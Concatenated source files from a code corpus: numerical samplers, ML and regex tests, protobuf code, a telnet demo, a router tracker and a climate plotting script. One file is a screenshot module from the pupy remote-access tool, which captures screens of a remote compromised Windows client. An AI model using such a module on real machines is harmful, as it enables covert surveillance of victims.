def uniform(low=0.0, high=1.0, size=(1,1), sparsity=1.0):
"""
Draw samples from a uniform distribution.
Parameters
----------
low: Lower boundary of the output interval.
high: Upper boundary of the output interval.
size: Output shape (only tuple of length 2, i.e. (m, n), supported).
sparsity: Sparsity (between 0.0 and 1.0).
Examples
--------
>>> import systemml as sml
>>> import numpy as np
>>> sml.setSparkContext(sc)
>>> from systemml import random
>>> m1 = sml.random.uniform(size=(3,3))
>>> m1.toNumPy()
array([[ 0.54511396, 0.11937437, 0.72975775],
[ 0.14135946, 0.01944448, 0.52544478],
[ 0.67582422, 0.87068849, 0.02766852]])
"""
if len(size) != 2:
raise TypeError('Incorrect type for size. Expected tuple of length 2')
INPUTS = []
rows = asStr(size[0])
cols = asStr(size[1])
low = asStr(low)
high = asStr(high)
sparsity = asStr(sparsity)
return constructSamplingNode(INPUTS, [OUTPUT_ID, ' = random.uniform(', rows, ',', cols, ',', sparsity, ',', low, ',', high, ')\n'])
def poisson(lam=1.0, size=(1,1), sparsity=1.0):
"""
Draw samples from a Poisson distribution.
Parameters
----------
lam: Expectation of interval, should be > 0.
size: Output shape (only tuple of length 2, i.e. (m, n), supported).
sparsity: Sparsity (between 0.0 and 1.0).
Examples
--------
>>> import systemml as sml
>>> import numpy as np
>>> sml.setSparkContext(sc)
>>> from systemml import random
>>> m1 = sml.random.poisson(lam=1, size=(3,3))
>>> m1.toNumPy()
array([[ 1., 0., 2.],
[ 1., 0., 0.],
[ 0., 0., 0.]])
"""
if len(size) != 2:
raise TypeError('Incorrect type for size. Expected tuple of length 2')
INPUTS = []
rows = asStr(size[0])
cols = asStr(size[1])
lam = asStr(lam)
sparsity = asStr(sparsity)
return constructSamplingNode(INPUTS, [OUTPUT_ID, ' = random.poisson(', rows, ',', cols, ',', sparsity, ',', lam, ')\n'])
| apache-2.0 | -8,600,682,359,173,167,000 | 32.5 | 140 | 0.598526 | false |
zigitax/pupy | pupy/modules/screenshot.py | 27 | 3951 | # -*- coding: UTF8 -*-
# --------------------------------------------------------------
# Copyright (c) 2015, Nicolas VERDIER ([email protected])
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE
# --------------------------------------------------------------
from pupylib.PupyModule import *
from rpyc.utils.classic import download
import os
import os.path
import textwrap
import logging
import datetime
from zlib import compress, crc32
import struct
import subprocess
__class_name__="Screenshoter"
def pil_save(filename, pixels, width, height):
from PIL import Image, ImageFile
buffer_len = (width * 3 + 3) & -4
img = Image.frombuffer('RGB', (width, height), pixels, 'raw', 'BGR', buffer_len, 1)
ImageFile.MAXBLOCK = width * height
img=img.transpose(Image.FLIP_TOP_BOTTOM)
img.save(filename, quality=95, optimize=True, progressive=True)
logging.info('Screenshot saved to %s'%filename)
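# Hedged usage sketch (added for illustration, not part of the original module):
# pil_save expects a raw bottom-up BGR pixel buffer such as the one returned by
# pupwinutils.screenshot.get_pixels on the remote side, e.g.
#     pil_save('shot.jpg', screenshot_pixels, screen['width'], screen['height'])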
class Screenshoter(PupyModule):
""" take a screenshot :) """
@windows_only
def is_compatible(self):
pass
def init_argparse(self):
self.arg_parser = PupyArgumentParser(prog='screenshot', description=self.__doc__)
self.arg_parser.add_argument('-e', '--enum', action='store_true', help='enumerate screen')
        self.arg_parser.add_argument('-s', '--screen', type=int, default=None, help='take a screenshot of a specific screen (default: capture all screens in one screenshot)')
self.arg_parser.add_argument('-v', '--view', action='store_true', help='directly open eog on the screenshot for preview')
def run(self, args):
try:
os.makedirs("./data/screenshots")
except Exception:
pass
self.client.load_package("pupwinutils.screenshot")
screens=None
if args.screen is None:
screens=self.client.conn.modules['pupwinutils.screenshot'].enum_display_monitors(oneshot=True)
else:
screens=self.client.conn.modules['pupwinutils.screenshot'].enum_display_monitors()
if args.enum:
res=""
for i, screen in enumerate(screens):
res+="{:<3}: {}\n".format(i,screen)
return res
if args.screen is None:
args.screen=0
selected_screen=screens[args.screen]
screenshot_pixels=self.client.conn.modules["pupwinutils.screenshot"].get_pixels(selected_screen)
filepath=os.path.join("./data/screenshots","scr_"+self.client.short_name()+"_"+str(datetime.datetime.now()).replace(" ","_").replace(":","-")+".jpg")
pil_save(filepath, screenshot_pixels, selected_screen["width"], selected_screen["height"])
if args.view:
subprocess.Popen(["eog",filepath])
self.success("screenshot saved to %s"%filepath)
| bsd-3-clause | -7,028,888,693,545,197,000 | 49.012658 | 756 | 0.727158 | false |
PaddlePaddle/Paddle | python/paddle/fluid/tests/unittests/mkldnn/test_quantize_mkldnn_op.py | 2 | 6353 | # Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import unittest
import numpy as np
from paddle.fluid.tests.unittests.op_test import OpTest
class TestQuantizeOp(OpTest):
def setUp(self):
self.op_type = 'quantize'
self.scale = 255.0
self.shift = 0.0
self.input_size = [1, 1, 5, 5] # Naive nChw16c
self.is_negative = False
self.output_format = 'NCHW'
self.set_scale()
self.set_shift()
self.set_is_negative()
self.set_input_size()
self.set_output_format()
self.prepare_input()
self.prepare_output()
def prepare_input(self):
if self.is_negative:
# input data values are from interval [-1.0, 1.0)
self.input = (2 * np.random.random_sample(self.input_size) - 1
).astype('float32')
else:
# input data values are from interval [0.0, 1.0)
self.input = (
np.random.random_sample(self.input_size)).astype('float32')
self.inputs = {'Input': OpTest.np_dtype_to_fluid_dtype(self.input)}
self.attrs = {
'Scale': self.scale,
'Shift': self.shift,
'is_negative_input': self.is_negative,
'output_format': self.output_format
}
def prepare_output(self):
input_data_type = 'int8' if self.is_negative else 'uint8'
output = np.rint(self.input * self.scale + self.shift).astype(
input_data_type)
self.outputs = {'Output': output}
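    # Worked example (added note, not part of the original test): with the default
    # scale=255.0 and shift=0.0, an input value of 0.5 maps to
    # np.rint(0.5 * 255.0 + 0.0) = 128 stored as uint8; on the signed path
    # (scale=127.0, is_negative_input=True), 0.5 maps to np.rint(63.5) = 64 as int8.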
def test_check_output(self):
# TODO(wangzhongpu): support mkldnn op in dygraph mode
self.check_output(check_dygraph=False)
def check_raise_error(self, msg):
try:
self.check_output()
except Exception as e:
if msg in str(e):
raise AttributeError
else:
print(e)
def set_scale(self):
pass
def set_shift(self):
pass
def set_is_negative(self):
pass
def set_input_size(self):
pass
def set_output_format(self):
pass
class TestQuantizeOp1(TestQuantizeOp):
def set_scale(self):
self.scale = 127.0
def set_is_negative(self):
        self.is_negative = True
class TestQuantizeOp2(TestQuantizeOp):
def set_scale(self):
self.scale = 255.0
def set_is_negative(self):
        self.is_negative = False
class TestQuantizeOp_ZeroScale(TestQuantizeOp):
def set_scale(self):
self.scale = 0.0
def prepare_output(self):
self.output = np.zeros(self.input_size)
self.outputs = {'Output': self.output}
def test_check_output(self):
self.assertRaises(AttributeError, self.check_raise_error,
'Quantization scale cannot be 0.0')
# 2-dim input
# P - positive input
class TestQuantizeOpShift_NCHW_2_P(TestQuantizeOp):
def set_output_format(self):
self.output_format = 'NCHW'
def set_is_negative(self):
        self.is_negative = False
def set_scale(self):
self.scale = 255.0
def set_shift(self):
self.shift = 0.0
def set_input_size(self):
self.input_size = [2, 3]
# 2-dim input
# N - negative input
class TestQuantizeOpShift_NCHW_2_N(TestQuantizeOpShift_NCHW_2_P):
def set_is_negative(self):
        self.is_negative = True
def set_scale(self):
self.scale = 127.0
def set_shift(self):
self.shift = 128.0
class TestQuantizeOpShift_NHWC_2_P(TestQuantizeOpShift_NCHW_2_P):
def set_output_format(self):
self.output_format = 'NHWC'
class TestQuantizeOpShift_NHWC_2_N(TestQuantizeOpShift_NCHW_2_N):
def set_output_format(self):
self.output_format = 'NHWC'
# 3-dim input
class TestQuantizeOpShift_NCHW_3_P(TestQuantizeOpShift_NCHW_2_P):
def set_input_size(self):
self.input_size = [2, 3, 4]
class TestQuantizeOpShift_NCHW_3_N(TestQuantizeOpShift_NCHW_2_N):
def set_input_size(self):
self.input_size = [2, 3, 4]
class TestQuantizeOpShift_NHWC_3_P(TestQuantizeOpShift_NCHW_3_P):
def set_output_format(self):
self.output_format = 'NHWC'
class TestQuantizeOpShift_NHWC_3_N(TestQuantizeOpShift_NCHW_3_N):
def set_output_format(self):
self.output_format = 'NHWC'
# 4-dim input
class TestQuantizeOpShift_NCHW_4_P(TestQuantizeOpShift_NCHW_2_P):
def set_input_size(self):
self.input_size = [2, 3, 4, 5]
class TestQuantizeOpShift_NCHW_4_N(TestQuantizeOpShift_NCHW_2_N):
def set_input_size(self):
self.input_size = [2, 3, 4, 5]
class TestQuantizeOpShift_NHWC_4_P(TestQuantizeOpShift_NCHW_4_P):
def set_output_format(self):
self.output_format = 'NHWC'
class TestQuantizeOpShift_NHWC_4_N(TestQuantizeOpShift_NCHW_4_N):
def set_output_format(self):
self.output_format = 'NHWC'
class TestQuantizeOp_NegativeShift(TestQuantizeOp):
def set_is_negative(self):
        self.is_negative = False
def set_scale(self):
self.scale = 100.0
def set_shift(self):
self.shift = -10.0
def prepare_output(self):
self.output = np.zeros(self.input_size)
self.outputs = {'Output': self.output}
def test_check_output(self):
self.assertRaises(AttributeError, self.check_raise_error,
'Quantization shift must be nonnegative.')
class TestQuantizeOp_TooBigShift(TestQuantizeOp_NegativeShift):
def set_shift(self):
self.shift = 300.0
def test_check_output(self):
self.assertRaises(
AttributeError, self.check_raise_error,
'Quantization shift must be less than or equal to 255.')
if __name__ == '__main__':
unittest.main()
| apache-2.0 | -7,742,969,942,922,523,000 | 26.149573 | 75 | 0.629309 | false |
seler/gipsy | gipsy/dashboard/presets/google_analytics.py | 4 | 1666 | from gipsy.dashboard.dashboard import Dashboard
from gipsy.dashboard.widgets import widgets, widgets_google_analytics
class DashboardDefault(Dashboard):
"""
    Default and example class for dashboards using Google Analytics specific widgets.
    This class simply uses a render method where widgets are added. The widgets property is a list
    that can be appended to as follows.
    The Google Analytics widgets are plug and play, but feel free to override them.
    Read the documentation for more information on how to set up Google Analytics on your application.
"""
def render(self):
# metrics evolution
self.widgets.append(widgets_google_analytics.WidgetGAPageViewsEvolution())
# metrics evolution
self.widgets.append(widgets_google_analytics.WidgetGASessionsEvolution())
# metrics single
self.widgets.append(widgets.WidgetMetricsSingle(
title='currently active users',
label='active users',
count=2564,
))
# line chart
self.widgets.append(widgets_google_analytics.WidgetGALineChart())
# metrics list
self.widgets.append(widgets.WidgetMetricsList(items=[
{'icon': 'fa-file-image-o', 'label': 'posts', 'value': 75},
{'icon': 'fa-comment-o', 'label': 'comments', 'value': 192},
{'icon': 'fa-files-o', 'label': 'pages', 'value': 12},
{'icon': 'fa-flag-o', 'label': 'in moderation', 'value': 4},
]))
# model list
self.widgets.append(widgets.WidgetModelList(items={}))
# admin logs
self.widgets.append(widgets.WidgetAdminLog())
| bsd-3-clause | -17,095,780,913,899,328 | 38.666667 | 100 | 0.654862 | false |
girishramnani/hacking-tools | pyhashcat/sre_yield/tests/test_cachingseq.py | 3 | 2039 | #!/usr/bin/env python2
#
# Copyright 2011-2014 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from sre_yield import cachingseq
class CachingFuncSequenceTest(unittest.TestCase):
def testLimits(self):
c = cachingseq.CachingFuncSequence(lambda i: i, 10)
self.assertEqual(9, c[9])
self.assertEqual(9, c[-1])
self.assertEqual(0, c[0])
self.assertEqual(0, c[-10])
self.assertRaises(IndexError, lambda: c[10])
self.assertRaises(IndexError, lambda: c[11])
self.assertRaises(IndexError, lambda: c[-11])
self.assertRaises(IndexError, lambda: c[-12])
self.assertEqual(2, len(c._cache))
# Make sure .func is settable at runtime...
c.func = lambda i: 'bbb'
self.assertEqual('bbb', c[1])
# ...and that we don't call it again.
self.assertEqual(0, c[0])
def testIter(self):
c = cachingseq.CachingFuncSequence(lambda i: i, 10)
# Cache empty on construction
self.assertEqual(0, len(c._cache))
self.assertEqual(10, len(c))
self.assertEqual(list(range(10)), list(c))
# Cache full after iteration
self.assertEqual(10, len(c._cache))
def testIncFunc(self):
def first_func(x):
assert x == 0
return 1
def inc_func(i, prev):
return prev * 2
c = cachingseq.CachingFuncSequence(first_func, 10, inc_func)
self.assertEqual([1, 2, 4, 8, 16, 32, 64, 128, 256, 512], list(c))
| mit | -6,653,969,502,603,725,000 | 32.42623 | 74 | 0.642962 | false |
earshel/PokeyPySnipe | POGOProtos/Networking/Requests/Messages/EncounterMessage_pb2.py | 16 | 3623 | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: POGOProtos/Networking/Requests/Messages/EncounterMessage.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='POGOProtos/Networking/Requests/Messages/EncounterMessage.proto',
package='POGOProtos.Networking.Requests.Messages',
syntax='proto3',
serialized_pb=_b('\n>POGOProtos/Networking/Requests/Messages/EncounterMessage.proto\x12\'POGOProtos.Networking.Requests.Messages\"s\n\x10\x45ncounterMessage\x12\x14\n\x0c\x65ncounter_id\x18\x01 \x01(\x06\x12\x16\n\x0espawn_point_id\x18\x02 \x01(\t\x12\x17\n\x0fplayer_latitude\x18\x03 \x01(\x01\x12\x18\n\x10player_longitude\x18\x04 \x01(\x01\x62\x06proto3')
)
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
_ENCOUNTERMESSAGE = _descriptor.Descriptor(
name='EncounterMessage',
full_name='POGOProtos.Networking.Requests.Messages.EncounterMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='encounter_id', full_name='POGOProtos.Networking.Requests.Messages.EncounterMessage.encounter_id', index=0,
number=1, type=6, cpp_type=4, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='spawn_point_id', full_name='POGOProtos.Networking.Requests.Messages.EncounterMessage.spawn_point_id', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='player_latitude', full_name='POGOProtos.Networking.Requests.Messages.EncounterMessage.player_latitude', index=2,
number=3, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='player_longitude', full_name='POGOProtos.Networking.Requests.Messages.EncounterMessage.player_longitude', index=3,
number=4, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=107,
serialized_end=222,
)
DESCRIPTOR.message_types_by_name['EncounterMessage'] = _ENCOUNTERMESSAGE
EncounterMessage = _reflection.GeneratedProtocolMessageType('EncounterMessage', (_message.Message,), dict(
DESCRIPTOR = _ENCOUNTERMESSAGE,
__module__ = 'POGOProtos.Networking.Requests.Messages.EncounterMessage_pb2'
# @@protoc_insertion_point(class_scope:POGOProtos.Networking.Requests.Messages.EncounterMessage)
))
_sym_db.RegisterMessage(EncounterMessage)
# @@protoc_insertion_point(module_scope)
| mit | -4,732,532,667,061,366,000 | 39.255556 | 360 | 0.742479 | false |
google-code/android-scripting | python/src/Demo/sockets/telnet.py | 47 | 3010 | #! /usr/bin/env python
# Minimal interface to the Internet telnet protocol.
#
# It refuses all telnet options and does not recognize any of the other
# telnet commands, but can still be used to connect in line-by-line mode.
# It's also useful to play with a number of other services,
# like time, finger, smtp and even ftp.
#
# Usage: telnet host [port]
#
# The port may be a service name or a decimal port number;
# it defaults to 'telnet'.
import sys, posix, time
from socket import *
BUFSIZE = 1024
# Telnet protocol characters
IAC = chr(255) # Interpret as command
DONT = chr(254)
DO = chr(253)
WONT = chr(252)
WILL = chr(251)
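# Added note (not in the original demo): the parent loop below refuses every telnet
# option negotiation the server attempts, i.e.
#     server sends IAC DO opt    ->  client replies IAC WONT opt
#     server sends IAC WILL opt  ->  client replies IAC DONT opt
# which keeps the session in plain line-by-line mode.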
def main():
host = sys.argv[1]
try:
hostaddr = gethostbyname(host)
except error:
sys.stderr.write(sys.argv[1] + ': bad host name\n')
sys.exit(2)
#
if len(sys.argv) > 2:
servname = sys.argv[2]
else:
servname = 'telnet'
#
if '0' <= servname[:1] <= '9':
port = eval(servname)
else:
try:
port = getservbyname(servname, 'tcp')
except error:
sys.stderr.write(servname + ': bad tcp service name\n')
sys.exit(2)
#
s = socket(AF_INET, SOCK_STREAM)
#
try:
s.connect((host, port))
except error, msg:
sys.stderr.write('connect failed: ' + repr(msg) + '\n')
sys.exit(1)
#
pid = posix.fork()
#
if pid == 0:
# child -- read stdin, write socket
while 1:
line = sys.stdin.readline()
s.send(line)
else:
# parent -- read socket, write stdout
iac = 0 # Interpret next char as command
opt = '' # Interpret next char as option
while 1:
data = s.recv(BUFSIZE)
if not data:
# EOF; kill child and exit
sys.stderr.write( '(Closed by remote host)\n')
posix.kill(pid, 9)
sys.exit(1)
cleandata = ''
for c in data:
if opt:
print ord(c)
s.send(opt + c)
opt = ''
elif iac:
iac = 0
if c == IAC:
cleandata = cleandata + c
elif c in (DO, DONT):
if c == DO: print '(DO)',
else: print '(DONT)',
opt = IAC + WONT
elif c in (WILL, WONT):
if c == WILL: print '(WILL)',
else: print '(WONT)',
opt = IAC + DONT
else:
print '(command)', ord(c)
elif c == IAC:
iac = 1
print '(IAC)',
else:
cleandata = cleandata + c
sys.stdout.write(cleandata)
sys.stdout.flush()
try:
main()
except KeyboardInterrupt:
pass
| apache-2.0 | 3,464,976,746,490,562,600 | 26.614679 | 73 | 0.470432 | false |
viralpandey/kivy | kivy/geometry.py | 47 | 3795 | '''
Geometry utilities
==================
This module contains some helper functions for geometric calculations.
'''
__all__ = ('circumcircle', 'minimum_bounding_circle')
from kivy.vector import Vector
def circumcircle(a, b, c):
'''
Computes the circumcircle of a triangle defined by a, b, c.
See: http://en.wikipedia.org/wiki/Circumscribed_circle
:Parameters:
`a` : iterable containing at least 2 values (for x and y)
The 1st point of the triangle.
`b` : iterable containing at least 2 values (for x and y)
The 2nd point of the triangle.
`c` : iterable containing at least 2 values (for x and y)
The 3rd point of the triangle.
:Return:
A tuple that defines the circle :
* The first element in the returned tuple is the center as (x, y)
* The second is the radius (float)
'''
P = Vector(a[0], a[1])
Q = Vector(b[0], b[1])
R = Vector(c[0], c[1])
mPQ = (P + Q) * .5
mQR = (Q + R) * .5
numer = -(- mPQ.y * R.y + mPQ.y * Q.y + mQR.y * R.y - mQR.y * Q.y
- mPQ.x * R.x + mPQ.x * Q.x + mQR.x * R.x - mQR.x * Q.x)
denom = (-Q.x * R.y + P.x * R.y - P.x * Q.y +
Q.y * R.x - P.y * R.x + P.y * Q.x)
t = numer / denom
cx = -t * (Q.y - P.y) + mPQ.x
cy = t * (Q.x - P.x) + mPQ.y
return ((cx, cy), (P - (cx, cy)).length())
def minimum_bounding_circle(points):
'''
Returns the minimum bounding circle for a set of points.
For a description of the problem being solved, see the `Smallest Circle
Problem <http://en.wikipedia.org/wiki/Smallest_circle_problem>`_.
The function uses Applet's Algorithm, the runtime is O\(h^3, \*n\),
where h is the number of points in the convex hull of the set of points.
**But** it runs in linear time in almost all real world cases.
See: http://tinyurl.com/6e4n5yb
:Parameters:
`points` : iterable
A list of points (2 tuple with x,y coordinates)
:Return:
A tuple that defines the circle:
* The first element in the returned tuple is the center (x, y)
* The second the radius (float)
'''
points = [Vector(p[0], p[1]) for p in points]
if len(points) == 1:
return (points[0].x, points[0].y), 0.0
if len(points) == 2:
p1, p2 = points
return (p1 + p2) * .5, ((p1 - p2) * .5).length()
# determine a point P with the smallest y value
P = min(points, key=lambda p: p.y)
# find a point Q such that the angle of the line segment
# PQ with the x axis is minimal
def x_axis_angle(q):
if q == P:
return 1e10 # max val if the same, to skip
return abs((q - P).angle((1, 0)))
Q = min(points, key=x_axis_angle)
for p in points:
# find R such that angle PRQ is minimal
def angle_pq(r):
if r in (P, Q):
return 1e10 # max val if the same, to skip
return abs((r - P).angle(r - Q))
R = min(points, key=angle_pq)
# check for case 1 (angle PRQ is obtuse), the circle is determined
# by two points, P and Q. radius = |(P-Q)/2|, center = (P+Q)/2
if angle_pq(R) > 90.0:
return (P + Q) * .5, ((P - Q) * .5).length()
# if angle RPQ is obtuse, make P = R, and try again
if abs((R - P).angle(Q - P)) > 90:
P = R
continue
# if angle PQR is obtuse, make Q = R, and try again
if abs((P - Q).angle(R - Q)) > 90:
Q = R
continue
# all angles were acute..we just need the circle through the
# two points furthest apart!
break
# find the circumcenter for triangle given by P,Q,R
return circumcircle(P, Q, R)
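# Minimal, hedged usage sketch (added; not part of the original module). The triangle
# (0, 0), (4, 0), (0, 3) has its right angle at the origin, so both helpers should
# report the circle centred on the hypotenuse midpoint (2.0, 1.5) with radius 2.5.
if __name__ == '__main__':
    center, radius = circumcircle((0, 0), (4, 0), (0, 3))
    print('circumcircle:', center, radius)
    center, radius = minimum_bounding_circle([(0, 0), (4, 0), (0, 3), (1, 1)])
    print('minimum bounding circle:', center, radius)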
| mit | -7,776,645,507,134,660,000 | 30.363636 | 76 | 0.548353 | false |
teodoc/home-assistant | homeassistant/components/device_tracker/luci.py | 10 | 5820 | """
homeassistant.components.device_tracker.luci
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Device tracker platform that supports scanning an OpenWrt router for device
presence.
It's required that the luci RPC package is installed on the OpenWRT router:
# opkg install luci-mod-rpc
Configuration:
To use the Luci tracker you will need to add something like the following
to your config/configuration.yaml
device_tracker:
platform: luci
host: YOUR_ROUTER_IP
username: YOUR_ADMIN_USERNAME
password: YOUR_ADMIN_PASSWORD
Variables:
host
*Required
The IP address of your router, e.g. 192.168.1.1.
username
*Required
The username of a user with administrative privileges, usually 'admin'.
password
*Required
The password for your given admin account.
"""
import logging
import json
from datetime import timedelta
import re
import threading
import requests
from homeassistant.const import CONF_HOST, CONF_USERNAME, CONF_PASSWORD
from homeassistant.helpers import validate_config
from homeassistant.util import Throttle
from homeassistant.components.device_tracker import DOMAIN
# Return cached results if last scan was less then this time ago
MIN_TIME_BETWEEN_SCANS = timedelta(seconds=5)
_LOGGER = logging.getLogger(__name__)
def get_scanner(hass, config):
""" Validates config and returns a Luci scanner. """
if not validate_config(config,
{DOMAIN: [CONF_HOST, CONF_USERNAME, CONF_PASSWORD]},
_LOGGER):
return None
scanner = LuciDeviceScanner(config[DOMAIN])
return scanner if scanner.success_init else None
# pylint: disable=too-many-instance-attributes
class LuciDeviceScanner(object):
""" This class queries a wireless router running OpenWrt firmware
for connected devices. Adapted from Tomato scanner.
# opkg install luci-mod-rpc
for this to work on the router.
The API is described here:
http://luci.subsignal.org/trac/wiki/Documentation/JsonRpcHowTo
(Currently, we do only wifi iwscan, and no DHCP lease access.)
"""
def __init__(self, config):
host = config[CONF_HOST]
username, password = config[CONF_USERNAME], config[CONF_PASSWORD]
self.parse_api_pattern = re.compile(r"(?P<param>\w*) = (?P<value>.*);")
self.lock = threading.Lock()
self.last_results = {}
self.token = _get_token(host, username, password)
self.host = host
self.mac2name = None
self.success_init = self.token is not None
def scan_devices(self):
""" Scans for new devices and return a
list containing found device ids. """
self._update_info()
return self.last_results
def get_device_name(self, device):
""" Returns the name of the given device or None if we don't know. """
with self.lock:
if self.mac2name is None:
url = 'http://{}/cgi-bin/luci/rpc/uci'.format(self.host)
result = _req_json_rpc(url, 'get_all', 'dhcp',
params={'auth': self.token})
if result:
hosts = [x for x in result.values()
if x['.type'] == 'host' and
'mac' in x and 'name' in x]
mac2name_list = [
(x['mac'].upper(), x['name']) for x in hosts]
self.mac2name = dict(mac2name_list)
else:
# Error, handled in the _req_json_rpc
return
return self.mac2name.get(device.upper(), None)
@Throttle(MIN_TIME_BETWEEN_SCANS)
def _update_info(self):
""" Ensures the information from the Luci router is up to date.
Returns boolean if scanning successful. """
if not self.success_init:
return False
with self.lock:
_LOGGER.info("Checking ARP")
url = 'http://{}/cgi-bin/luci/rpc/sys'.format(self.host)
result = _req_json_rpc(url, 'net.arptable',
params={'auth': self.token})
if result:
self.last_results = []
for device_entry in result:
# Check if the Flags for each device contain
# NUD_REACHABLE and if so, add it to last_results
if int(device_entry['Flags'], 16) & 0x2:
self.last_results.append(device_entry['HW address'])
return True
return False
def _req_json_rpc(url, method, *args, **kwargs):
""" Perform one JSON RPC operation. """
data = json.dumps({'method': method, 'params': args})
try:
res = requests.post(url, data=data, timeout=5, **kwargs)
except requests.exceptions.Timeout:
_LOGGER.exception("Connection to the router timed out")
return
if res.status_code == 200:
try:
result = res.json()
except ValueError:
# If json decoder could not parse the response
_LOGGER.exception("Failed to parse response from luci")
return
try:
return result['result']
except KeyError:
_LOGGER.exception("No result in response from luci")
return
elif res.status_code == 401:
# Authentication error
_LOGGER.exception(
"Failed to authenticate, "
"please check your username and password")
return
else:
_LOGGER.error("Invalid response from luci: %s", res)
def _get_token(host, username, password):
""" Get authentication token for the given host+username+password """
url = 'http://{}/cgi-bin/luci/rpc/auth'.format(host)
return _req_json_rpc(url, 'login', username, password)
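# Hedged illustration (added; not part of the original component). The helpers above
# speak luci's JSON-RPC API; a manual session would look roughly like this, where the
# host and credentials are placeholders:
#     token = _get_token('192.168.1.1', 'admin', 'secret')
#     arp = _req_json_rpc('http://192.168.1.1/cgi-bin/luci/rpc/sys',
#                         'net.arptable', params={'auth': token})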
| mit | -6,545,202,801,521,779,000 | 30.630435 | 79 | 0.600859 | false |
zmlabe/IceVarFigs | Scripts/SeaSurfaceTemperatures/plot_ersst5.py | 1 | 5197 | """
Plot selected years of monthly ERSSTv5 global data
Website : https://www1.ncdc.noaa.gov/pub/data/cmb/ersst/v5/netcdf/
Author : Zachary M. Labe
Date : 22 July 2017
"""
from netCDF4 import Dataset
import matplotlib.pyplot as plt
from mpl_toolkits.basemap import Basemap, addcyclic, shiftgrid
import numpy as np
import datetime
import nclcmaps as ncm
### Read in data files from server
directoryfigure = './Figures/'
directorydata = './Data/'
### Define constants
now = datetime.datetime.now()
month = now.month
monthsq = [r'Jan',r'Feb',r'Mar',r'Apr',r'May',r'Jun',r'Jul',
r'Aug',r'Sep',r'Oct',r'Nov',r'Dec',r'Jan']
### Input selected years and months!
years = np.arange(1992,2016+1,1)
months = np.arange(1,12+1,1)
### Read in data
sst = np.empty((years.shape[0],months.shape[0],89,180))
for i in range(years.shape[0]):
for j in range(months.shape[0]):
filename = directorydata + 'ersst.v5.%s%02d.nc' % (years[i],
months[j])
data = Dataset(filename)
lats = data.variables['lat'][:]
lons = data.variables['lon'][:]
sst[i,j,:,:] = data.variables['sst'][0,0,:,:]
data.close()
print('Completed: Read %s year!' % years[i])
### Locate missing data
sst[np.where(sst == -999)] = np.nan
### Reshape data
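### (25 years x 12 months = 300 monthly fields, flattened into one time axis)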
sst = np.reshape(sst,(300,89,180))
### Create list of years for plotting
yearsqq = np.repeat(years,12)
###############################################################################
###############################################################################
###############################################################################
### Plot figure
### Define parameters (dark)
def setcolor(x, color):
for m in x:
for t in x[m][1]:
t.set_color(color)
plt.rc('text',usetex=True)
plt.rc('font',**{'family':'sans-serif','sans-serif':['Avant Garde']})
plt.rc('savefig',facecolor='black')
plt.rc('axes',edgecolor='k')
plt.rc('xtick',color='white')
